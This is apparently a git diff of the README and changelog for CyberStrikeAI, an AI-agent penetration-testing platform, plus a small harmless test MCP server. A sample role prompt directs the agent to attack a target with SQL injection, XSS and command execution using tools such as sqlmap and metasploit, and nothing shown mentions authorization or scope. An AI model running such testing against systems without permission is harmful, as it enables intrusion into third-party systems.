- 2025-12-25 – Added vulnerability management feature: full CRUD operations for tracking vulnerabilities discovered during testing. Supports severity levels (critical/high/medium/low/info), status workflow (open/confirmed/fixed/false_positive), filtering by conversation/severity/status, and comprehensive statistics dashboard.
|
||||
- 2025-12-25 – Added conversation grouping feature: organize conversations into groups, pin groups to top, rename/delete groups via context menu. All group data is persisted in the database.
|
||||
- 2025-12-24 – Refactored attack chain generation logic, achieving 2x faster generation speed. Redesigned attack chain frontend visualization for improved user experience.
|
||||
- 2025-12-20 – Added knowledge base feature with vector search, hybrid retrieval, and automatic indexing. AI agent can now search security knowledge during conversations.
|
||||
- 2025-12-19 – Added ZoomEye network space search engine tool (zoomeye_search) with support for IPv4/IPv6/web assets, facets statistics, and flexible query parameters.
|
||||
- 2025-12-18 – Optimized web frontend with enhanced sidebar navigation and improved user experience.
|
||||
- 2025-12-07 – Added FOFA network space search engine tool (fofa_search) with flexible query parameters and field configuration.
|
||||
- 2025-12-07 – Fixed positional parameter handling bug: ensure correct parameter position when using default values.
|
||||
- 2025-11-20 – Added automatic compression/summarization for oversized tool logs and MCP transcripts.
|
||||
- 2025-11-17 – Introduced AI-built attack-chain visualization with interactive graph and risk scoring.
|
||||
- 2025-11-15 – Delivered large-result pagination, advanced filtering, and external MCP federation.
|
||||
- 2025-11-14 – Optimized tool lookups (O(1)), execution record cleanup, and DB pagination.
|
||||
- 2025-11-13 – Added web authentication, settings UI, and MCP stdio mode integration.
|
||||
|
||||
## 404Starlink
|
||||
|
||||
<img src="./img/404StarLinkLogo.png" width="30%">
|
||||
<img src="./images/404StarLinkLogo.png" width="30%">
|
||||
|
||||
CyberStrikeAI has joined [404Starlink](https://github.com/knownsec/404StarLink)
|
||||
|
||||
## TCH Top-Ranked Intelligent Pentest Project
|
||||
<div align="left">
|
||||
<a href="https://zc.tencent.com/competition/competitionHackathon?code=cha004" target="_blank">
|
||||
<img src="./img/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
|
||||
<img src="./images/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
## Stargazers over time
|
||||

|
||||
|
||||
|
||||
---
|
||||
|
||||
Need help or want to contribute? Open an issue or PR—community tooling additions are welcome!
|
||||
|
||||
|
||||
|
||||
@@ -1,28 +1,77 @@
|
||||
<div align="center">
|
||||
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="300">
|
||||
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200">
|
||||
</div>
|
||||
|
||||
# CyberStrikeAI
|
||||
|
||||
[中文](README_CN.md) | [English](README.md)
|
||||
|
||||
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎与完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
||||
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能,以及完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
||||
|
||||
> 在安全领域,真正稀缺的从来不是工具,而是判断。判断来自经验,而经验往往只能依附在个人身上,难以继承、难以复用。CyberStrikeAI 尝试解决的不是“如何自动化攻击”,而是:在复杂、多变、充满不确定性的环境中,下一步“应该做什么”,以及“为什么”。它不追求更激进的自动化,而是试图把安全专家的思考方式、决策路径与失败经验,转化为一个可约束、可复盘、可演进的系统能力。如果经验可以脱离个人而存在,那么安全,才真正具备了被系统性继承的可能。
|
||||
|
||||
## 界面与集成预览
|
||||
- Web 控制台
|
||||
<img src="./img/效果.png" alt="Preview" width="560">
|
||||
- MCP stdio 模式
|
||||
<img src="./img/mcp-stdio2.png" alt="Preview" width="560">
|
||||
- 外部 MCP 服务器 & 攻击链视图
|
||||
<img src="./img/外部MCP接入.png" alt="Preview" width="560">
|
||||
<img src="./img/攻击链.png" alt="Preview" width="560">
|
||||
|
||||
<div align="center">
|
||||
|
||||
### 系统仪表盘概览
|
||||
|
||||
<img src="./images/dashboard.png" alt="系统仪表盘" width="100%">
|
||||
|
||||
*仪表盘提供系统运行状态、安全漏洞、工具使用情况和知识库的全面概览,帮助用户快速了解平台核心功能和当前状态。*
|
||||
|
||||
### 核心功能概览
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Web 控制台</strong><br/>
|
||||
<img src="./images/web-console.png" alt="Web 控制台" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>攻击链可视化</strong><br/>
|
||||
<img src="./images/attack-chain.png" alt="攻击链" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>任务管理</strong><br/>
|
||||
<img src="./images/task-management.png" alt="任务管理" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>漏洞管理</strong><br/>
|
||||
<img src="./images/vulnerability-management.png" alt="漏洞管理" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>MCP 管理</strong><br/>
|
||||
<img src="./images/mcp-management.png" alt="MCP 管理" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>MCP stdio 模式</strong><br/>
|
||||
<img src="./images/mcp-stdio2.png" alt="MCP stdio 模式" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>知识库</strong><br/>
|
||||
<img src="./images/knowledge-base.png" alt="知识库" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Skills 管理</strong><br/>
|
||||
<img src="./images/skills.png" alt="Skills 管理" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>角色管理</strong><br/>
|
||||
<img src="./images/role-management.png" alt="角色管理" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</div>
|
||||
|
||||
## 特性速览
|
||||
|
||||
- 🤖 兼容 OpenAI/DeepSeek/Claude 等模型的智能决策引擎
|
||||
- 🔌 原生 MCP 协议,支持 HTTP / stdio 以及外部 MCP 接入
|
||||
- 🔌 原生 MCP 协议,支持 HTTP / stdio / SSE 传输模式以及外部 MCP 接入
|
||||
- 🧰 100+ 现成工具模版 + YAML 扩展能力
|
||||
- 📄 大结果分页、压缩与全文检索
|
||||
- 🔗 攻击链可视化、风险打分与步骤回放
|
||||
@@ -30,6 +79,9 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
- 📚 知识库功能:向量检索与混合搜索,为 AI 提供安全专业知识
|
||||
- 📁 对话分组管理:支持分组创建、置顶、重命名、删除等操作
|
||||
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
|
||||
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
|
||||
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
|
||||
- 🎯 Skills 技能系统:20+ 预设安全测试技能(SQL 注入、XSS、API 安全等),可附加到角色或由 AI 按需调用
|
||||
|
||||
## 工具概览
|
||||
|
||||
@@ -53,35 +105,40 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
|
||||
## 基础使用
|
||||
|
||||
### 快速上手
|
||||
1. **获取代码并安装依赖**
|
||||
```bash
|
||||
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git
|
||||
cd CyberStrikeAI-main
|
||||
go mod download
|
||||
```
|
||||
2. **初始化 Python 虚拟环境(tools 目录所需)**
|
||||
`tools/*.yaml` 中大量工具(如 `api-fuzzer`、`http-framework-test`、`install-python-package` 等)依赖 Python 生态。首次进入项目根目录时请创建本地虚拟环境并安装依赖:
|
||||
```bash
|
||||
python3 -m venv venv
|
||||
source venv/bin/activate
|
||||
pip install -r requirements.txt
|
||||
```
|
||||
两个 Python 专用工具(`install-python-package` 与 `execute-python-script`)会自动检测该 `venv`(或已经激活的 `$VIRTUAL_ENV`),因此默认 `env_name` 即可满足大多数场景。
|
||||
3. **配置模型与鉴权**
|
||||
启动后在 Web 端 `Settings` 填写,或直接编辑 `config.yaml`:
|
||||
```yaml
|
||||
openai:
|
||||
api_key: "sk-your-key"
|
||||
base_url: "https://api.openai.com/v1"
|
||||
model: "gpt-4o"
|
||||
auth:
|
||||
password: "" # 为空则首次启动自动生成强口令
|
||||
session_duration_hours: 12
|
||||
security:
|
||||
tools_dir: "tools"
|
||||
```
|
||||
4. **按需安装安全工具(可选)**
|
||||
### 快速上手(一条命令部署)
|
||||
|
||||
**环境要求:**
|
||||
- Go 1.21+ ([下载安装](https://go.dev/dl/))
|
||||
- Python 3.10+ ([下载安装](https://www.python.org/downloads/))
|
||||
|
||||
**一条命令部署:**
|
||||
```bash
|
||||
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git
|
||||
cd CyberStrikeAI-main
|
||||
chmod +x run.sh && ./run.sh
|
||||
```
|
||||
|
||||
`run.sh` 脚本会自动完成:
|
||||
- ✅ 检查并验证 Go 和 Python 环境
|
||||
- ✅ 创建 Python 虚拟环境
|
||||
- ✅ 安装 Python 依赖包
|
||||
- ✅ 下载 Go 依赖模块
|
||||
- ✅ 编译构建项目
|
||||
- ✅ 启动服务器
|
||||
|
||||
**首次配置:**
|
||||
1. **配置 AI 模型 API**(首次使用前必填)
|
||||
- 启动后访问 http://localhost:8080
|
||||
- 进入 `设置` → 填写 API 配置信息:
|
||||
```yaml
|
||||
openai:
|
||||
api_key: "sk-your-key"
|
||||
base_url: "https://api.openai.com/v1" # 或 https://api.deepseek.com/v1
|
||||
model: "gpt-4o" # 或 deepseek-chat, claude-3-opus 等
|
||||
```
|
||||
- 或启动前直接编辑 `config.yaml` 文件
|
||||
2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password`)
|
||||
3. **安装安全工具(可选)** - 按需安装所需工具:
|
||||
```bash
|
||||
# macOS
|
||||
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
|
||||
@@ -89,22 +146,27 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
|
||||
```
|
||||
未安装的工具会自动跳过或改用替代方案。
|
||||
5. **启动服务**
|
||||
```bash
|
||||
chmod +x run.sh && ./run.sh
|
||||
# 或
|
||||
go run cmd/server/main.go
|
||||
# 或
|
||||
go build -o cyberstrike-ai cmd/server/main.go
|
||||
```
|
||||
6. **浏览器访问** http://localhost:8080 ,使用日志中提示的密码登录并开始对话。
|
||||
|
||||
**其他启动方式:**
|
||||
```bash
|
||||
# 直接运行(需手动配置环境)
|
||||
go run cmd/server/main.go
|
||||
|
||||
# 手动编译
|
||||
go build -o cyberstrike-ai cmd/server/main.go
|
||||
./cyberstrike-ai
|
||||
```
|
||||
|
||||
**说明:** Python 虚拟环境(`venv/`)由 `run.sh` 自动创建和管理。需要 Python 的工具(如 `api-fuzzer`、`http-framework-test` 等)会自动使用该环境。
|
||||
|
||||
### 常用流程
|
||||
- **对话测试**:自然语言触发多步工具编排,SSE 实时输出。
|
||||
- **角色化测试**:从预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试等)中选择,自定义 AI 行为和可用工具。每个角色可应用自定义系统提示词,并可限制可用工具列表,实现聚焦的测试场景。
|
||||
- **工具监控**:查看任务队列、执行日志、大文件附件。
|
||||
- **会话历史**:所有对话与工具调用保存在 SQLite,可随时重放。
|
||||
- **对话分组**:将对话按项目或主题组织到不同分组,支持置顶、重命名、删除等操作,所有数据持久化存储。
|
||||
- **漏洞管理**:在测试过程中创建、更新和跟踪发现的漏洞。支持按严重程度(严重/高/中/低/信息)、状态(待确认/已确认/已修复/误报)和对话进行过滤,查看统计信息并导出发现。
|
||||
- **批量任务管理**:创建任务队列,批量添加多个任务,执行前可编辑或删除任务,然后依次顺序执行。每个任务会作为独立对话执行,支持完整的状态跟踪(待执行/执行中/已完成/失败/已取消)和执行历史。
|
||||
- **可视化配置**:在界面中切换模型、启停工具、设置迭代次数等。
|
||||
|
||||
### 默认安全措施
|
||||
@@ -115,6 +177,44 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
|
||||
## 进阶使用
|
||||
|
||||
### 角色化测试
|
||||
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
|
||||
- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
|
||||
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
|
||||
- **Skills 集成**:角色可附加安全测试技能。技能名称会作为提示添加到系统提示词中,AI 智能体可通过 `read_skill` 工具按需获取技能内容。
|
||||
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`skills`、`enabled` 字段。
|
||||
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
|
||||
|
||||
**创建自定义角色示例:**
|
||||
1. 在 `roles/` 目录创建 YAML 文件(如 `roles/custom-role.yaml`):
|
||||
```yaml
|
||||
name: 自定义角色
|
||||
description: 专用测试场景
|
||||
user_prompt: 你是一个专注于 API 安全的专业安全测试人员...
|
||||
icon: "\U0001F4E1"
|
||||
tools:
|
||||
- api-fuzzer
|
||||
- arjun
|
||||
- graphql-scanner
|
||||
skills:
|
||||
- api-security-testing
|
||||
- sql-injection-testing
|
||||
enabled: true
|
||||
```
|
||||
2. 重启服务或重新加载配置,角色会出现在角色选择下拉菜单中。
|
||||
|
||||
### Skills 技能系统
|
||||
- **预设技能**:系统内置 20+ 个预设的安全测试技能(SQL 注入、XSS、API 安全、云安全、容器安全等),位于 `skills/` 目录。
|
||||
- **提示词中的技能提示**:当选择某个角色时,该角色附加的技能名称会作为推荐添加到系统提示词中。技能内容不会自动注入,AI 智能体需要时需使用 `read_skill` 工具获取技能详情。
|
||||
- **按需调用**:AI 智能体也可以通过内置工具(`list_skills`、`read_skill`)按需访问技能,允许在执行任务过程中动态获取相关技能。
|
||||
- **结构化格式**:每个技能是一个目录,包含一个 `SKILL.md` 文件,详细描述测试方法、工具使用、最佳实践和示例。技能支持 YAML front matter 格式用于元数据。
|
||||
- **自定义技能**:通过在 `skills/` 目录添加目录即可创建自定义技能。每个技能目录应包含一个 `SKILL.md` 文件。
|
||||
|
||||
**创建自定义技能:**
|
||||
1. 在 `skills/` 目录创建目录(如 `skills/my-skill/`)
|
||||
2. 在该目录下创建 `SKILL.md` 文件,编写技能内容
|
||||
3. 在角色的 YAML 文件中,通过添加 `skills` 字段将该技能附加到角色
|
||||
|
||||
### 工具编排与扩展
|
||||
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
|
||||
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
|
||||
@@ -135,7 +235,7 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
### MCP 全场景
|
||||
- **Web 模式**:自带 HTTP MCP 服务供前端调用。
|
||||
- **MCP stdio 模式**:`go run cmd/mcp-stdio/main.go` 可接入 Cursor/命令行。
|
||||
- **外部 MCP 联邦**:在设置中注册第三方 MCP(HTTP/stdio),按需启停并实时查看调用统计与健康度。
|
||||
- **外部 MCP 联邦**:在设置中注册第三方 MCP(HTTP/stdio/SSE),按需启停并实时查看调用统计与健康度。
|
||||
|
||||
#### MCP stdio 快速集成
|
||||
1. **编译可执行文件**(在项目根目录执行):
|
||||
@@ -175,6 +275,62 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
}
|
||||
```
|
||||
|
||||
#### 外部 MCP 联邦(HTTP/stdio/SSE)
|
||||
CyberStrikeAI 支持通过三种传输模式连接外部 MCP 服务器:
|
||||
- **HTTP 模式** – 通过 HTTP POST 进行传统的请求/响应通信
|
||||
- **stdio 模式** – 通过标准输入/输出进行进程间通信
|
||||
- **SSE 模式** – 通过 Server-Sent Events 实现实时流式通信
|
||||
|
||||
添加外部 MCP 服务器:
|
||||
1. 打开 Web 界面,进入 **设置 → 外部MCP**。
|
||||
2. 点击 **添加外部MCP**,以 JSON 格式提供配置:
|
||||
|
||||
**HTTP 模式示例:**
|
||||
```json
|
||||
{
|
||||
"my-http-mcp": {
|
||||
"transport": "http",
|
||||
"url": "http://127.0.0.1:8081/mcp",
|
||||
"description": "HTTP MCP 服务器",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**stdio 模式示例:**
|
||||
```json
|
||||
{
|
||||
"my-stdio-mcp": {
|
||||
"command": "python3",
|
||||
"args": ["/path/to/mcp-server.py"],
|
||||
"description": "stdio MCP 服务器",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**SSE 模式示例:**
|
||||
```json
|
||||
{
|
||||
"my-sse-mcp": {
|
||||
"transport": "sse",
|
||||
"url": "http://127.0.0.1:8082/sse",
|
||||
"description": "SSE MCP 服务器",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
3. 点击 **保存**,然后点击 **启动** 连接服务器。
|
||||
4. 实时监控连接状态、工具数量和健康度。
|
||||
|
||||
**SSE 模式优势:**
|
||||
- 通过 Server-Sent Events 实现实时双向通信
|
||||
- 适用于需要持续数据流的场景
|
||||
- 对于基于推送的通知,延迟更低
|
||||
|
||||
可在 `cmd/test-sse-mcp-server/` 目录找到用于验证的测试 SSE MCP 服务器。
|
||||
|
||||
|
||||
### 知识库功能
|
||||
- **向量检索**:AI 智能体在对话过程中可自动调用 `search_knowledge_base` 工具搜索知识库中的安全知识。
|
||||
@@ -215,8 +371,10 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
||||
|
||||
|
||||
### 自动化与安全
|
||||
- **REST API**:认证、会话、任务、监控、漏洞管理等接口全部开放,可与 CI/CD 集成。
|
||||
- **REST API**:认证、会话、任务、监控、漏洞管理、角色管理等接口全部开放,可与 CI/CD 集成。
|
||||
- **角色管理 API**:通过 `/api/roles` 端点管理安全测试角色:`GET /api/roles`(列表)、`GET /api/roles/:name`(获取角色)、`POST /api/roles`(创建角色)、`PUT /api/roles/:name`(更新角色)、`DELETE /api/roles/:name`(删除角色)。角色以 YAML 文件形式存储在 `roles/` 目录,支持热加载。
|
||||
- **漏洞管理 API**:通过 `/api/vulnerabilities` 端点管理漏洞:`GET /api/vulnerabilities`(列表,支持过滤)、`POST /api/vulnerabilities`(创建)、`GET /api/vulnerabilities/:id`(获取)、`PUT /api/vulnerabilities/:id`(更新)、`DELETE /api/vulnerabilities/:id`(删除)、`GET /api/vulnerabilities/stats`(统计)。
|
||||
- **批量任务 API**:通过 `/api/batch-tasks` 端点管理批量任务队列:`POST /api/batch-tasks`(创建队列)、`GET /api/batch-tasks`(列表)、`GET /api/batch-tasks/:queueId`(获取队列)、`POST /api/batch-tasks/:queueId/start`(开始执行)、`POST /api/batch-tasks/:queueId/cancel`(取消)、`DELETE /api/batch-tasks/:queueId`(删除队列)、`POST /api/batch-tasks/:queueId/tasks`(添加任务)、`PUT /api/batch-tasks/:queueId/tasks/:taskId`(更新任务)、`DELETE /api/batch-tasks/:queueId/tasks/:taskId`(删除任务)。任务依次顺序执行,每个任务创建独立对话,支持完整状态跟踪。
|
||||
- **任务控制**:支持暂停/终止长任务、修改参数后重跑、流式获取日志。
|
||||
- **安全管理**:`/api/auth/change-password` 可即时轮换口令;建议在暴露 MCP 端口时配合网络层 ACL。
|
||||
|
||||
@@ -257,6 +415,8 @@ knowledge:
|
||||
top_k: 5 # 检索返回的 Top-K 结果数量
|
||||
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
|
||||
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0 表示纯向量检索,0.0 表示纯关键词检索
|
||||
roles_dir: "roles" # 角色配置文件目录(相对于配置文件所在目录)
|
||||
skills_dir: "skills" # Skills 目录(相对于配置文件所在目录)
|
||||
```
|
||||
|
||||
### 工具模版示例(`tools/nmap.yaml`)
|
||||
@@ -279,6 +439,26 @@ parameters:
|
||||
description: "端口范围,如 1-1000"
|
||||
```
|
||||
|
||||
### 角色配置示例(`roles/渗透测试.yaml`)
|
||||
|
||||
```yaml
|
||||
name: 渗透测试
|
||||
description: 专业渗透测试专家,全面深入的漏洞检测
|
||||
user_prompt: 你是一个专业的网络安全渗透测试专家。请使用专业的渗透测试方法和工具,对目标进行全面的安全测试,包括但不限于SQL注入、XSS、CSRF、文件包含、命令执行等常见漏洞。
|
||||
icon: "\U0001F3AF"
|
||||
tools:
|
||||
- nmap
|
||||
- sqlmap
|
||||
- nuclei
|
||||
- burpsuite
|
||||
- metasploit
|
||||
- httpx
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
enabled: true
|
||||
```
|
||||
|
||||
## 项目结构
|
||||
|
||||
```
|
||||
@@ -287,7 +467,9 @@ CyberStrikeAI/
|
||||
├── internal/ # Agent、MCP 核心、路由与执行器
|
||||
├── web/ # 前端静态资源与模板
|
||||
├── tools/ # YAML 工具目录(含 100+ 示例)
|
||||
├── img/ # 文档配图
|
||||
├── roles/ # 角色配置文件目录(含 12+ 预设安全测试角色)
|
||||
├── skills/ # Skills 目录(含 20+ 预设安全测试技能)
|
||||
├── images/ # 文档配图
|
||||
├── config.yaml # 运行配置
|
||||
├── run.sh # 启动脚本
|
||||
└── README*.md
|
||||
@@ -312,33 +494,34 @@ CyberStrikeAI/
|
||||
构建最新一次测试的攻击链,只导出风险 >= 高的节点列表。
|
||||
```
|
||||
|
||||
## Changelog(近期)
|
||||
- 2025-12-25 —— 新增漏洞管理功能:完整的漏洞 CRUD 操作,支持跟踪测试过程中发现的漏洞。支持严重程度分级(严重/高/中/低/信息)、状态流转(待确认/已确认/已修复/误报)、按对话/严重程度/状态过滤,以及统计看板。
|
||||
- 2025-12-25 —— 新增对话分组功能:支持创建分组、将对话移动到分组、分组置顶、重命名和删除等操作,所有分组数据持久化存储到数据库。
|
||||
- 2025-12-24 —— 重构攻击链生成逻辑,生成速度提升一倍。重构攻击链前端页面展示,优化用户体验。
|
||||
- 2025-12-20 —— 新增知识库功能:支持向量检索、混合搜索与自动索引,AI 智能体可在对话中自动搜索安全知识。
|
||||
- 2025-12-19 —— 新增钟馗之眼(ZoomEye)网络空间搜索引擎工具(zoomeye_search),支持 IPv4/IPv6/Web 等资产搜索、统计项查询与灵活的查询参数配置。
|
||||
- 2025-12-18 —— 优化 Web 前端界面,增加侧边栏导航,提升用户体验。
|
||||
- 2025-12-07 —— 新增 FOFA 网络空间搜索引擎工具(fofa_search),支持灵活的查询参数与字段配置。
|
||||
- 2025-12-07 —— 修复位置参数处理 bug:当工具参数使用默认值时,确保后续参数位置正确传递。
|
||||
- 2025-11-20 —— 支持超大日志/MCP 记录的自动压缩与摘要回写。
|
||||
- 2025-11-17 —— 上线 AI 驱动的攻击链图谱与风险评分。
|
||||
- 2025-11-15 —— 提供大结果分页检索与外部 MCP 挂载能力。
|
||||
- 2025-11-14 —— 工具检索 O(1)、执行记录清理、数据库分页优化。
|
||||
- 2025-11-13 —— Web 鉴权、Settings 面板与 MCP stdio 模式发布。
|
||||
## 更新日志
|
||||
|
||||
### 近期亮点
|
||||
|
||||
- **2026-01-27** – 新增 OpenAPI 文档,提供交互式测试界面,支持对话管理、消息交互和结果查询
|
||||
- **2026-01-15** – 新增 Skills 技能系统,内置 20+ 预设安全测试技能
|
||||
- **2026-01-11** – 新增角色化测试功能,支持预设安全测试角色
|
||||
- **2026-01-08** – 新增 SSE 传输模式支持,外部 MCP 联邦支持三种模式
|
||||
- **2026-01-01** – 新增批量任务管理功能,支持队列式任务执行
|
||||
- **2025-12-25** – 新增漏洞管理和对话分组功能
|
||||
- **2025-12-20** – 新增知识库功能,支持向量检索和混合搜索
|
||||
|
||||
|
||||
## 404星链计划
|
||||
<img src="./img/404StarLinkLogo.png" width="30%">
|
||||
<img src="./images/404StarLinkLogo.png" width="30%">
|
||||
|
||||
CyberStrikeAI 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
|
||||
|
||||
## TCH Top-Ranked Intelligent Pentest Project
|
||||
<div align="left">
|
||||
<a href="https://zc.tencent.com/competition/competitionHackathon?code=cha004" target="_blank">
|
||||
<img src="./img/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
|
||||
<img src="./images/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
## Stargazers over time
|
||||

|
||||
|
||||
---
|
||||
|
||||
欢迎提交 Issue/PR 贡献新的工具模版或优化建议!
|
||||
|
||||
@@ -0,0 +1,56 @@
|
||||
# SSE MCP 测试服务器
|
||||
|
||||
这是一个用于验证SSE模式外部MCP功能的测试服务器。
|
||||
|
||||
## 使用方法
|
||||
|
||||
### 1. 启动测试服务器
|
||||
|
||||
```bash
|
||||
cd cmd/test-sse-mcp-server
|
||||
go run main.go
|
||||
```
|
||||
|
||||
服务器将在 `http://127.0.0.1:8082` 启动,提供以下端点:
|
||||
- `GET /sse` - SSE事件流端点
|
||||
- `POST /message` - 消息接收端点
|
||||
|
||||
### 2. 在CyberStrikeAI中添加配置
|
||||
|
||||
在Web界面中添加外部MCP配置,使用以下JSON:
|
||||
|
||||
```json
|
||||
{
|
||||
"test-sse-mcp": {
|
||||
"transport": "sse",
|
||||
"url": "http://127.0.0.1:8082/sse",
|
||||
"description": "SSE MCP测试服务器",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 3. 测试功能
|
||||
|
||||
测试服务器提供两个测试工具:
|
||||
|
||||
1. **test_echo** - 回显输入的文本
|
||||
- 参数:`text` (string) - 要回显的文本
|
||||
|
||||
2. **test_add** - 计算两个数字的和
|
||||
- 参数:`a` (number) - 第一个数字
|
||||
- 参数:`b` (number) - 第二个数字
|
||||
|
||||
## 工作原理
|
||||
|
||||
1. 客户端通过 `GET /sse` 建立SSE连接,接收服务器推送的事件
|
||||
2. 客户端通过 `POST /message` 发送MCP协议消息
|
||||
3. 服务器处理消息后,通过SSE连接推送响应
|
||||
|
||||
## 日志
|
||||
|
||||
服务器会输出以下日志:
|
||||
- SSE客户端连接/断开
|
||||
- 收到的请求(方法名和ID)
|
||||
- 工具调用详情
|
||||
|
||||
@@ -0,0 +1,395 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"log"
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/google/uuid"
|
||||
)
|
||||
|
||||
const ProtocolVersion = "2024-11-05"
|
||||
|
||||
// Message MCP消息
|
||||
type Message struct {
|
||||
ID interface{} `json:"id,omitempty"`
|
||||
Method string `json:"method,omitempty"`
|
||||
Params json.RawMessage `json:"params,omitempty"`
|
||||
Result json.RawMessage `json:"result,omitempty"`
|
||||
Error *Error `json:"error,omitempty"`
|
||||
Version string `json:"jsonrpc,omitempty"`
|
||||
}
|
||||
|
||||
// Error MCP错误
|
||||
type Error struct {
|
||||
Code int `json:"code"`
|
||||
Message string `json:"message"`
|
||||
Data interface{} `json:"data,omitempty"`
|
||||
}
|
||||
|
||||
// InitializeRequest 初始化请求
|
||||
type InitializeRequest struct {
|
||||
ProtocolVersion string `json:"protocolVersion"`
|
||||
Capabilities map[string]interface{} `json:"capabilities"`
|
||||
ClientInfo ClientInfo `json:"clientInfo"`
|
||||
}
|
||||
|
||||
// ClientInfo 客户端信息
|
||||
type ClientInfo struct {
|
||||
Name string `json:"name"`
|
||||
Version string `json:"version"`
|
||||
}
|
||||
|
||||
// InitializeResponse 初始化响应
|
||||
type InitializeResponse struct {
|
||||
ProtocolVersion string `json:"protocolVersion"`
|
||||
Capabilities ServerCapabilities `json:"capabilities"`
|
||||
ServerInfo ServerInfo `json:"serverInfo"`
|
||||
}
|
||||
|
||||
// ServerCapabilities 服务器能力
|
||||
type ServerCapabilities struct {
|
||||
Tools map[string]interface{} `json:"tools,omitempty"`
|
||||
}
|
||||
|
||||
// ServerInfo 服务器信息
|
||||
type ServerInfo struct {
|
||||
Name string `json:"name"`
|
||||
Version string `json:"version"`
|
||||
}
|
||||
|
||||
// Tool 工具定义
|
||||
type Tool struct {
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description"`
|
||||
InputSchema map[string]interface{} `json:"inputSchema"`
|
||||
}
|
||||
|
||||
// ListToolsResponse 列出工具响应
|
||||
type ListToolsResponse struct {
|
||||
Tools []Tool `json:"tools"`
|
||||
}
|
||||
|
||||
// CallToolRequest 调用工具请求
|
||||
type CallToolRequest struct {
|
||||
Name string `json:"name"`
|
||||
Arguments map[string]interface{} `json:"arguments"`
|
||||
}
|
||||
|
||||
// CallToolResponse 调用工具响应
|
